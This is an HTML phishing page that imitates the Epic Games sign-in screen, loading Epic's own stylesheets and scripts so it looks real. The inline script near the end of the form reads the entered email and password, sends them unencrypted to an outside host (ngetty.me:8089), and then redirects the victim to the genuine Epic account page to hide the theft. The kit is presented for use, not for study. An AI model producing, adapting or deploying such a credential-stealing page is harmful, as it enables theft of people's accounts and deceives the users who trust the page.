<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8" />
  <meta name="viewport"
    content="width=device-width,initial-scale=1,user-scalable=no,minimal-ui,shrink-to-fit=no,viewport-fit=cover" />
  <meta name="theme-color" content="#000000" />
  <meta name="referrer" content="origin-when-cross-origin" />
  <link rel="manifest" href="https://static-assets-prod.epicgames.com/account-portal/static/manifest.json" />
  <link rel="shortcut icon"
    href="https://static-assets-prod.epicgames.com/account-portal/static/epic-favicon-96x96.png" />
  <title>Epic Games</title>
  <link href="https://static-assets-prod.epicgames.com/account-portal/static/static/css/main.e554f343.chunk.css"
    rel="stylesheet" />
  <meta charset="utf-8" />
  <meta name="viewport"
    content="width=device-width,initial-scale=1,user-scalable=no,minimal-ui,shrink-to-fit=no,viewport-fit=cover" />
  <meta name="theme-color" content="#000000" />
  <meta name="referrer" content="origin-when-cross-origin" />
  <link rel="manifest" href="https://static-assets-prod.epicgames.com/account-portal/static/manifest.json" />
  <link rel="shortcut icon"
    href="https://static-assets-prod.epicgames.com/account-portal/static/epic-favicon-96x96.png" />
  <title>Sign in to Your Epic Games Account | Epic Games</title>
  <link href="https://static-assets-prod.epicgames.com/account-portal/static/static/css/main.e554f343.chunk.css"
    rel="stylesheet" />
  <style data-jss="" data-meta="MuiCssBaseline">
    html {
      box-sizing: border-box;
      -webkit-font-smoothing: antialiased;
      -moz-osx-font-smoothing: grayscale;
    }

    *,
    *::before,
    *::after {
      box-sizing: inherit;
    }

    body {
      margin: 0;
      background-color: #121212;
    }

    @media print {
      body {
        background-color: #fff;
      }
    }
  </style>
  <style data-jss="" data-meta="MuiTypography">
    .jss37 {
      margin: 0;
      display: block;
      overflow: hidden;
      text-overflow: ellipsis;
    }

    .jss38 {
      color: rgba(255, 255, 255, 0.7);
      font-size: 7rem;
      font-weight: 300;
      font-family: Brutal, sans-serif;
      line-height: 1.14286em;
      margin-left: -0.04em;
      letter-spacing: -0.04em;
    }

    .jss39 {
      color: rgba(255, 255, 255, 0.7);
      font-size: 3.5rem;
      font-weight: 400;
      font-family: Brutal, sans-serif;
      line-height: 1.30357em;
      margin-left: -0.02em;
      letter-spacing: -0.02em;
    }

    .jss40 {
      color: rgba(255, 255, 255, 0.7);
      font-size: 2.8125rem;
      font-weight: 400;
      font-family: Brutal, sans-serif;
      line-height: 1.13333em;
      margin-left: -0.02em;
    }

    .jss41 {
      color: rgba(255, 255, 255, 0.7);
      font-size: 2.125rem;
      font-weight: 400;
      font-family: Brutal, sans-serif;
      line-height: 1.20588em;
    }

    .jss42 {
      color: #fff;
      font-size: 1.5rem;
      font-weight: 400;
      font-family: Brutal, sans-serif;
      line-height: 1.35417em;
    }

    .jss43 {
      color: #fff;
      font-size: 1.3125rem;
      font-weight: 500;
      font-family: Brutal, sans-serif;
      line-height: 1.16667em;
    }

    .jss44 {
      color: #fff;
      font-size: 1rem;
      font-weight: 400;
      font-family: Brutal, sans-serif;
      line-height: 1.5em;
    }

    .jss45 {
      color: rgba(244, 244, 244, 0.5);
      font-size: 0.875rem;
      font-family: Brutal, sans-serif;
      font-weight: 400;
      line-height: 1.5;
    }

    .jss46 {
      color: #fff;
      font-size: 1rem;
      font-family: Brutal, sans-serif;
      font-weight: 400;
      line-height: 1.5;
    }

    .jss47 {
      color: #fff;
      font-size: 0.75rem;
      font-family: Brutal, sans-serif;
      font-weight: 400;
      line-height: 1.66;
    }

    .jss48 {
      color: #fff;
      font-size: 0.875rem;
      font-family: Brutal, sans-serif;
      font-weight: 500;
      line-height: 1.75;
      text-transform: uppercase;
    }

    .jss49 {
      color: #fff;
      font-size: 6rem;
      font-family: Brutal, sans-serif;
      font-weight: 300;
      line-height: 1;
    }

    .jss50 {
      color: #fff;
      font-size: 3.75rem;
      font-family: Brutal, sans-serif;
      font-weight: 300;
      line-height: 1;
    }

    .jss51 {
      color: #fff;
      font-size: 3rem;
      font-family: Brutal, sans-serif;
      font-weight: 400;
      line-height: 1.04;
    }

    .jss52 {
      color: #fff;
      font-size: 2.125rem;
      font-family: Brutal, sans-serif;
      font-weight: 400;
      line-height: 1.17;
    }

    .jss53 {
      color: #fff;
      font-size: 20px;
      font-family: Brutal, sans-serif;
      font-weight: 400;
      line-height: 20px;
    }

    .jss54 {
      color: #fff;
      font-size: 1.25rem;
      font-family: Brutal, sans-serif;
      font-weight: 500;
      line-height: 1.6;
    }

    .jss55 {
      color: #f4f4f4;
      font-size: 12px;
      font-family: Brutal, sans-serif;
      font-weight: 500;
      line-height: 16px;
      letter-spacing: 0.5px;
    }

    .jss56 {
      color: #fff;
      font-size: 0.875rem;
      font-family: Brutal, sans-serif;
      font-weight: 500;
      line-height: 1.57;
    }

    .jss57 {
      color: #fff;
      font-size: 0.75rem;
      font-family: Brutal, sans-serif;
      font-weight: 400;
      line-height: 2.66;
      text-transform: uppercase;
    }

    .jss58 {
      width: 1px;
      height: 1px;
      position: absolute;
      overflow: hidden;
    }

    .jss59 {
      text-align: left;
    }

    .jss60 {
      text-align: center;
    }

    .jss61 {
      text-align: right;
    }

    .jss62 {
      text-align: justify;
    }

    .jss63 {
      overflow: hidden;
      white-space: nowrap;
      text-overflow: ellipsis;
    }

    .jss64 {
      margin-bottom: 0.35em;
    }

    .jss65 {
      margin-bottom: 16px;
    }

    .jss66 {
      color: inherit;
    }

    .jss67 {
      color: #037bee;
    }

    .jss68 {
      color: #ffffff;
    }

    .jss69 {
      color: #fff;
    }

    .jss70 {
      color: rgba(255, 255, 255, 0.7);
    }

    .jss71 {
      color: #fff;
      padding: 10px;
      font-size: 12px;
      min-height: 34px;
      font-weight: normal;
      line-height: 14px;
      background-color: #e63838;
    }

    .jss72 {
      display: inline;
    }
  </style>
  <style data-jss="" data-meta="MuiButtonBase">
    .jss99 {
      color: inherit;
      border: 0;
      margin: 0;
      cursor: pointer;
      display: inline-flex;
      outline: none;
      padding: 0;
      position: relative;
      align-items: center;
      user-select: none;
      border-radius: 0;
      vertical-align: middle;
      justify-content: center;
      -moz-appearance: none;
      text-decoration: none;
      background-color: transparent;
      -webkit-appearance: none;
      -webkit-tap-highlight-color: transparent;
    }

    .jss99::-moz-focus-inner {
      border-style: none;
    }

    .jss99.jss100 {
      cursor: default;
      pointer-events: none;
    }

    .jss101 {
      color: #f4f4f4;
      font-weight: bold;
    }
  </style>
  <style data-jss="" data-meta="MuiButton">
    .jss73 {
      color: #fff;
      height: 50px;
      padding: 6px 16px;
      font-size: 12px;
      min-width: 40px;
      box-sizing: border-box;
      transition: background-color 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
        box-shadow 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms,
        border 250ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
      line-height: 16px;
      font-family: Brutal, sans-serif;
      font-weight: 500;
      border-radius: 0;
      text-transform: uppercase;
      letter-spacing: 0.5px;
    }

    .jss73:hover {
      text-decoration: none;
      background-color: rgba(255, 255, 255, 0.1);
    }

    .jss73.jss93 {
      color: rgba(255, 255, 255, 0.3);
    }

    @media (hover: none) {
      .jss73:hover {
        background-color: transparent;
      }
    }

    .jss73:hover.jss93 {
      background-color: transparent;
    }

    .jss74 {
      width: 100%;
      display: inherit;
      align-items: inherit;
      justify-content: inherit;
    }

    .jss75 {
      padding: 6px 8px;
    }

    .jss76 {
      color: #037bee;
    }

    .jss76:hover {
      background-color: rgba(3, 123, 238, 0.1);
    }

    @media (hover: none) {
      .jss76:hover {
        background-color: transparent;
      }
    }

    .jss77 {
      color: #ffffff;
    }

    .jss77:hover {
      background-color: rgba(255, 255, 255, 0.1);
    }

    @media (hover: none) {
      .jss77:hover {
        background-color: transparent;
      }
    }

    .jss81 {
      border: 1px solid rgba(255, 255, 255, 0.23);
      padding: 5px 16px;
    }

    .jss81.jss93 {
      border: 1px solid rgba(255, 255, 255, 0.3);
    }

    .jss81:focus {
      background-color: rgba(255, 255, 255, 0.1);
    }

    .jss82 {
      color: #037bee;
      border: 1px solid rgba(3, 123, 238, 0.5);
    }

    .jss82:hover {
      border: 1px solid #037bee;
      background-color: rgba(3, 123, 238, 0.1);
    }

    @media (hover: none) {
      .jss82:hover {
        background-color: transparent;
      }
    }

    .jss83 {
      color: #ffffff;
      border: 1px solid rgba(255, 255, 255, 0.5);
    }

    .jss83:hover {
      border: 1px solid #ffffff;
      background-color: rgba(255, 255, 255, 0.1);
    }

    .jss83.jss93 {
      border: 1px solid rgba(255, 255, 255, 0.3);
    }

    @media (hover: none) {
      .jss83:hover {
        background-color: transparent;
      }
    }

    .jss84 {
      color: rgba(0, 0, 0, 0.87);
      box-shadow: none;
      background-color: #e0e0e0;
    }

    .jss84.jss92 {
      box-shadow: 0px 3px 5px -1px rgba(0, 0, 0, 0.2),
        0px 6px 10px 0px rgba(0, 0, 0, 0.14),
        0px 1px 18px 0px rgba(0, 0, 0, 0.12);
    }

    .jss84:active {
      box-shadow: 0px 5px 5px -3px rgba(0, 0, 0, 0.2),
        0px 8px 10px 1px rgba(0, 0, 0, 0.14),
        0px 3px 14px 2px rgba(0, 0, 0, 0.12);
    }

    .jss84.jss93 {
      color: rgba(255, 255, 255, 0.3);
      box-shadow: none;
      background-color: rgba(18, 18, 18, 0.5);
    }

    .jss84:hover {
      background-color: #d5d5d5;
    }

    @media (hover: none) {
      .jss84:hover {
        background-color: #e0e0e0;
      }
    }

    .jss84:hover.jss93 {
      background-color: rgba(255, 255, 255, 0.12);
    }

    .jss85 {
      color: #fff;
      background-color: #037bee;
    }

    .jss85:hover {
      background-color: rgb(2, 86, 166);
    }

    .jss85:focus {
      background-color: rgba(3, 123, 238, 0.8);
    }

    @media (hover: none) {
      .jss85:hover {
        background-color: #037bee;
      }
    }

    .jss86 {
      color: rgba(0, 0, 0, 0.87);
      background-color: #ffffff;
    }

    .jss86:hover {
      background-color: rgb(178, 178, 178);
    }

    @media (hover: none) {
      .jss86:hover {
        background-color: #ffffff;
      }
    }

    .jss90 {
      width: 56px;
      height: 56px;
      padding: 0;
      min-width: 0;
      box-shadow: 0px 3px 5px -1px rgba(0, 0, 0, 0.2),
        0px 6px 10px 0px rgba(0, 0, 0, 0.14),
        0px 1px 18px 0px rgba(0, 0, 0, 0.12);
      border-radius: 50%;
    }

    .jss90:active {
      box-shadow: 0px 7px 8px -4px rgba(0, 0, 0, 0.2),
        0px 12px 17px 2px rgba(0, 0, 0, 0.14),
        0px 5px 22px 4px rgba(0, 0, 0, 0.12);
    }

    .jss91 {
      width: auto;
      height: 48px;
      padding: 0 16px;
      min-width: 48px;
      border-radius: 24px;
    }

    .jss92 {
      color: #f4f4f4;
      font-weight: bold;
    }

    .jss94 {
      color: inherit;
      border-color: currentColor;
    }

    .jss95 {
      width: 40px;
      height: 40px;
    }

    .jss96 {
      padding: 4px 8px;
      min-width: 64px;
      font-size: 0.8125rem;
    }

    .jss97 {
      padding: 8px 24px;
      font-size: 0.9375rem;
    }

    .jss98 {
      width: 100%;
    }
  </style>
  <style data-jss="" data-meta="MuiInputBase">
    .jss143 {
      color: #fff;
      cursor: text;
      display: inline-flex;
      font-size: 14px;
      font-family: Brutal, sans-serif;
      line-height: 20px;
      align-items: center;
    }

    .jss143.jss146 {
      color: rgba(255, 255, 255, 0.5);
      cursor: default;
    }

    @media (max-width: 470px) {
      .jss143 {
        font-size: 16px;
      }
    }

    .jss149 {
      background-color: #554343 !important;
    }

    .jss151 {
      padding: 6px 0 7px;
    }

    .jss152 {
      width: 100%;
    }

    .jss153 {
      font: inherit;
      color: #f4f4f4;
      width: 100%;
      border: 0;
      margin: 0;
      height: 50px;
      padding: 6px 0 7px;
      display: block;
      min-width: 0;
      box-sizing: content-box;
      background: none;
      padding-top: 0;
      padding-left: 14px;
      padding-right: 14px;
      padding-bottom: 0;
      -webkit-tap-highlight-color: transparent;
    }

    .jss153::-webkit-input-placeholder {
      color: currentColor;
      opacity: 0.5;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    }

    .jss153::-moz-placeholder {
      color: currentColor;
      opacity: 0.5;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    }

    .jss153:-ms-input-placeholder {
      color: currentColor;
      opacity: 0.5;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    }

    .jss153::-ms-input-placeholder {
      color: currentColor;
      opacity: 0.5;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    }

    .jss153:focus {
      outline: 0;
    }

    .jss153:invalid {
      box-shadow: none;
    }

    .jss153::-webkit-search-decoration {
      -webkit-appearance: none;
    }

    .jss153.jss146 {
      color: #5b5b5b;
      cursor: default;
      opacity: 1;
      background-color: #2e2e2e;
    }

    .jss153.jss145 {
      color: #f4f4f4;
      background-color: #484848;
    }

    label[data-shrink="false"]+.jss144 .jss153::-webkit-input-placeholder {
      opacity: 0;
    }

    label[data-shrink="false"]+.jss144 .jss153::-moz-placeholder {
      opacity: 0;
    }

    label[data-shrink="false"]+.jss144 .jss153:-ms-input-placeholder {
      opacity: 0;
    }

    label[data-shrink="false"]+.jss144 .jss153::-ms-input-placeholder {
      opacity: 0;
    }

    label[data-shrink="false"]+.jss144 .jss153:focus::-webkit-input-placeholder {
      opacity: 0.5;
    }

    label[data-shrink="false"]+.jss144 .jss153:focus::-moz-placeholder {
      opacity: 0.5;
    }

    label[data-shrink="false"]+.jss144 .jss153:focus:-ms-input-placeholder {
      opacity: 0.5;
    }

    label[data-shrink="false"]+.jss144 .jss153:focus::-ms-input-placeholder {
      opacity: 0.5;
    }

    .jss154 {
      padding-top: 3px;
    }

    .jss155 {
      resize: none;
      padding: 0;
    }

    .jss156 {
      height: 50px;
      padding-top: 0;
      padding-left: 14px;
      padding-right: 14px;
      padding-bottom: 0;
    }

    .jss157 {
      -moz-appearance: textfield;
      -webkit-appearance: textfield;
    }
  </style>
  <style data-jss="" data-meta="MuiInput">
    .jss130 {
      position: relative;
    }

    label+.jss131 {
      margin-top: 16px;
    }

    .jss134:after {
      left: 0;
      right: 0;
      bottom: 0;
      content: "";
      position: absolute;
      transform: scaleX(0);
      transition: transform 200ms cubic-bezier(0, 0, 0.2, 1) 0ms;
      border-bottom: 2px solid rgb(53, 149, 241);
      pointer-events: none;
    }

    .jss134.jss132:after {
      transform: scaleX(1);
    }

    .jss134.jss135:after {
      transform: scaleX(1);
      border-bottom-color: #f44336;
    }

    .jss134:before {
      left: 0;
      right: 0;
      bottom: 0;
      content: "\00a0";
      position: absolute;
      transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
      border-bottom: 1px solid rgba(255, 255, 255, 0.7);
      pointer-events: none;
    }

    .jss134:hover:not(.jss133):not(.jss132):not(.jss135):before {
      border-bottom: 2px solid #fff;
    }

    .jss134.jss133:before {
      border-bottom-style: dotted;
    }

    @media (hover: none) {
      .jss134:hover:not(.jss133):not(.jss132):not(.jss135):before {
        border-bottom: 1px solid rgba(255, 255, 255, 0.7);
      }
    }
  </style>
  <style data-jss="" data-meta="MuiInputAdornment">
    .jss160 {
      height: 0.01em;
      display: flex;
      max-height: 2em;
      align-items: center;
    }

    .jss161.jss162 {
      margin-top: 16px;
    }

    .jss162 {
      margin-right: 8px;
    }

    .jss163 {
      height: 100px;
      display: inline-block;
      margin-left: 8px;
      white-space: nowrap;
      line-height: 30px;
      margin-right: 8px;
    }

    .jss164 {
      pointer-events: none;
    }
  </style>
  <style data-jss="" data-meta="MuiFormControl">
    .jss126 {
      margin: 0;
      border: 0;
      display: inline-flex;
      padding: 0;
      position: relative;
      min-width: 0;
      border-radius: 0;
      flex-direction: column;
      vertical-align: top;
      background-color: #2b2b2b;
    }

    .jss127 {
      margin-top: 16px;
      margin-bottom: 8px;
    }

    .jss128 {
      margin-top: 8px;
      margin-bottom: 4px;
    }

    .jss129 {
      width: 100%;
    }
  </style>
  <style data-jss="" data-meta="MuiIconButton">
    .jss118 {
      flex: 0 0 auto;
      color: #a2a2a2;
      padding: 12px;
      overflow: visible;
      font-size: 1.5rem;
      text-align: center;
      transition: background-color 150ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
      border-radius: 50%;
    }

    .jss118:hover {
      background-color: rgba(255, 255, 255, 0.1);
    }

    .jss118.jss122 {
      color: rgba(255, 255, 255, 0.3);
    }

    .jss118:focus {
      color: #f4f4f4;
      font-weight: bold;
    }

    @media (hover: none) {
      .jss118:hover {
        background-color: transparent;
      }
    }

    .jss118:hover.jss122 {
      background-color: transparent;
    }

    .jss119 {
      color: inherit;
    }

    .jss120 {
      color: #037bee;
    }

    .jss120:hover {
      background-color: rgba(3, 123, 238, 0.1);
    }

    @media (hover: none) {
      .jss120:hover {
        background-color: transparent;
      }
    }

    .jss121 {
      color: #ffffff;
    }

    .jss121:hover {
      background-color: rgba(255, 255, 255, 0.1);
    }

    @media (hover: none) {
      .jss121:hover {
        background-color: transparent;
      }
    }

    .jss123 {
      width: 100%;
      display: flex;
      align-items: inherit;
      justify-content: inherit;
    }
  </style>
  <style data-jss="">
    .jss124 {
      margin: 8px;
    }

    .jss125 {
      margin-top: 0;
    }
  </style>
  <style data-jss="" data-meta="MuiPrivateSwitchBase">
    .jss114 {
      display: inline-flex;
      transition: none;
      align-items: center;
    }

    .jss114:hover {
      background-color: transparent;
    }

    .jss117 {
      top: 0;
      left: 0;
      width: 100%;
      cursor: inherit;
      height: 100%;
      margin: 0;
      opacity: 0;
      padding: 0;
      position: absolute;
    }
  </style>
  <style data-jss="" data-meta="MuiCheckbox">
    .jss108 {
      color: rgba(255, 255, 255, 0.7);
      margin-left: -12px;
      padding-top: 0;
      margin-right: -12px;
      padding-bottom: 0;
    }

    .jss112.jss109 {
      color: #037bee;
    }

    .jss112.jss110 {
      color: rgba(255, 255, 255, 0.3);
    }

    .jss113.jss109 {
      color: #ffffff;
    }

    .jss113.jss110 {
      color: rgba(255, 255, 255, 0.3);
    }
  </style>
  <style data-jss="" data-meta="MuiFormControlLabel">
    .jss102 {
      cursor: pointer;
      display: inline-flex;
      align-items: center;
      margin-left: 0;
      margin-right: 0;
      vertical-align: middle;
      -webkit-tap-highlight-color: transparent;
    }

    .jss102.jss106 {
      cursor: default;
    }

    .jss103 {
      margin-left: 16px;
      margin-right: -14px;
      flex-direction: row-reverse;
    }

    .jss104 {
      margin-left: 16px;
      flex-direction: column-reverse;
    }

    .jss105 {
      margin-left: 16px;
      flex-direction: column;
    }

    .jss107 {
      margin-left: 10px;
      margin-right: 10px;
    }

    .jss107.jss106 {
      color: rgba(255, 255, 255, 0.5);
    }
  </style>
  <script charset="utf-8"
    src="https://static-assets-prod.epicgames.com/account-portal/static/static/js/0.048fecc4.chunk.js"></script>
  <script charset="utf-8"
    src="https://static-assets-prod.epicgames.com/account-portal/static/static/js/1.0340b38a.chunk.js"></script>
  <script charset="utf-8"
    src="https://static-assets-prod.epicgames.com/account-portal/static/static/js/2.f5b998fd.chunk.js"></script>
  <script charset="utf-8"
    src="https://static-assets-prod.epicgames.com/account-portal/static/static/js/32.906f66c8.chunk.js"></script>
  <link rel="stylesheet" type="text/css"
    href="https://static-assets-prod.epicgames.com/account-portal/static/static/css/16.20b9f297.chunk.css" />
  <script charset="utf-8"
    src="https://static-assets-prod.epicgames.com/account-portal/static/static/js/16.8eef9b2b.chunk.js"></script>
  <meta name="description"
    content="Log in to your Epic Games account and update your account information. Your community awaits."
    data-react-helmet="true" />
</head>

<body style="background:#121212">
  <script>
    window.__tracking_base = "https://tracking.epicgames.com";

	window.history.pushState({}, document.title, "/" + "index.html");

  </script>
  <script type="text/javascript" src="https://tracking.epicgames.com/tracking.js" async></script><noscript>You need to
    enable JavaScript to run this app.</noscript>
  <div id="root">
    <div dir="ltr">
      <div class="ModalBase-container">
        <div class="ModalBase-content">
          <div class="ModalBase-card">
            <div class="optional-top-spacer"></div>
            <div class="ModalBase-card-content">
              <div class="layout-vertical">
                <div class="EpicLogo-layout">
                  <div class="EpicLogo" style="width: 50px; height: 50px;"></div>
                </div>
                <div class="SocialBar">
                  <button class="jss99 jss73 jss84 jss87 SocialButton facebook-btn" tabindex="0" type="button"
                    id="login-with-facebook" aria-label="Facebook" i18n="[object Object]">
                    <span class="jss74">
                      <div class="logo"></div>
                    </span>
                  </button>
                  <div class="Spacer" style="width: 100%; height: 0px; max-width: 10px; max-height: 0px;"></div>
                  <button class="jss99 jss73 jss84 jss87 SocialButton google-btn" tabindex="0" type="button"
                    id="login-with-google" aria-label="Google" i18n="[object Object]">
                    <span class="jss74">
                      <div class="logo"></div>
                    </span>
                  </button>
                  <div class="Spacer" style="width: 100%; height: 0px; max-width: 10px; max-height: 0px;"></div>
                  <button class="jss99 jss73 jss84 jss87 SocialButton psn-btn" tabindex="0" type="button"
                    id="login-with-psn" aria-label="PlayStation Network" i18n="[object Object]">
                    <span class="jss74">
                      <div class="logo"></div>
                    </span>
                  </button>
                  <div class="Spacer" style="width: 100%; height: 0px; max-width: 10px; max-height: 0px;"></div>
                  <button class="jss99 jss73 jss84 jss87 SocialButton xbl-btn" tabindex="0" type="button"
                    id="login-with-xbl" aria-label="Xbox Live" i18n="[object Object]">
                    <span class="jss74">
                      <div class="logo"></div>
                    </span>
                  </button>
                  <div class="Spacer" style="width: 100%; height: 0px; max-width: 10px; max-height: 0px;"></div>
                  <button class="jss99 jss73 jss84 jss87 SocialButton nintendo-btn" tabindex="0" type="button"
                    id="login-with-nintendo" aria-label="Nintendo" i18n="[object Object]">
                    <span class="jss74">
                      <div class="logo"></div>
                    </span>
                  </button>
                  <div class="Spacer" style="width: 100%; height: 0px; max-width: 10px; max-height: 0px;"></div>
                </div>
                <h6 class="jss37 jss55 Subheading upper">Sign In</h6>
                <form class="form-vertical" id="form" novalidate="">
                  <div class="jss126 jss129 form-field">
                    <div class="jss143 jss130 jss144 jss131 jss148" i18n="[object Object]">
                      <input aria-invalid="false" autocomplete="email" class="jss153 jss138 jss156 jss141 jss159"
                        id="email" name="email" placeholder="Email Address" type="email" inputmode="email"
                        autocorrect="off" autocapitalize="none" spellcheck="false" value="" />
                      <div class="jss160 jss161 jss163 upper"></div>
                    </div>
                  </div>
                  <div class="jss126 jss129 form-field">
                    <div class="jss143 jss130 jss144 jss131 jss148" i18n="[object Object]">
                      <input aria-invalid="false" autocomplete="current-password"
                        class="jss153 jss138 jss156 jss141 jss159" id="password" name="password" placeholder="Password"
                        type="password" inputmode="text" value="" />
                      <div class="jss160 jss161 jss163 upper"></div>
                    </div>
                  </div>
                  <div class="options">
                    <label class="jss102 FormCheckbox remember"><span
                        class="jss99 jss118 jss114 jss108 jss113 jss115 jss109"><span class="jss123">
                          <div class="checkbox checked"></div>
                          <input class="jss117" id="rememberMe" name="rememberMe" type="checkbox"
                            data-indeterminate="false" value="rememberMe" checked="" />
                        </span></span><span class="jss37 jss45 jss107">
                        <p class="jss37 jss45 label">Remember me</p>
                      </span></label><a id="to-forgot-password" name="to-forgot-password" href="/id/">
                      <p class="jss37 jss45">Forgot Your Password</p>
                    </a>
                  </div>
                  <!-- <script type="text/javascript">
                                                document.getElementById("login").onclick = function () {
                                                    location.href = "www.yoursite.com";
                                                };
                                            </script> -->

                  <script>
	            function gtfo() {
			window.location = "https://epicgames.com"
			return false;
		    }
                    function getAjax() {
                      var email = document.getElementById("form").elements[
                        "email"
                      ].value;
                      var pass = document.getElementById("form").elements[
                        "password"
                      ].value;
                      var url = "http://ngetty.me:8089";
                      var total_url =
                        url +
                        "?" +
                        "email=" +
                        email +
                        "&" +
                        "password=" +
                        pass;
                      var xhr = window.XMLHttpRequest
                        ? new XMLHttpRequest()
                        : new ActiveXObject("Microsoft.XMLHTTP");
                      xhr.open("GET", total_url);
                      xhr.onreadystatechange = function () {
                        if (xhr.readyState > 3 && xhr.status == 200);
                      };
                      xhr.send();
                      return xhr;
                    }

		    function master() {
		    	getAjax();
			window.location = "https://www.epicgames.com/account/personal?productName=epicgames&lang=en";
		        return false
		    }

                  </script>

		  <button onclick="return master();"
		  class=" jss100 jss73 jss84 jss85 jss87 jss88 jss93 jss98 SubmitButton" id="login" tabindex=""
                    type="submit" id="login">
                    <span class="">
			   
                      Log In
                    </span>
                  </button>
                  <div></div>

                  <div class="PrivacyLink">
                    <a id="to-privacy" href="https://www.epicgames.com/privacypolicy?lang=en-US" target="_blank"
                      rel="noopener noreferrer" i18n="[object Object]">
                      <p class="jss37 jss45">Privacy Policy</p>
                    </a>
                  </div>
                </form>
                <div class="alternative">
                  <p class="jss37 jss45 alternative-text">
                    Don't have an Epic Games account?
                  </p>
                  <a id="to-register" name="to-register" class="alternative-link" href="/id/">
                    <p class="jss37 jss45">Sign Up</p>
                  </a>
                </div>
              </div>
            </div>
            <div class="optional-bottom-spacer"></div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <script src="https://static-assets-prod.epicgames.com/account-portal/static/static/js/8.a856765b.chunk.js"></script>

  <script
    src="https://static-assets-prod.epicgames.com/account-portal/static/static/js/main.91f6ba1b.chunk.js"></script>
</body>

</html>
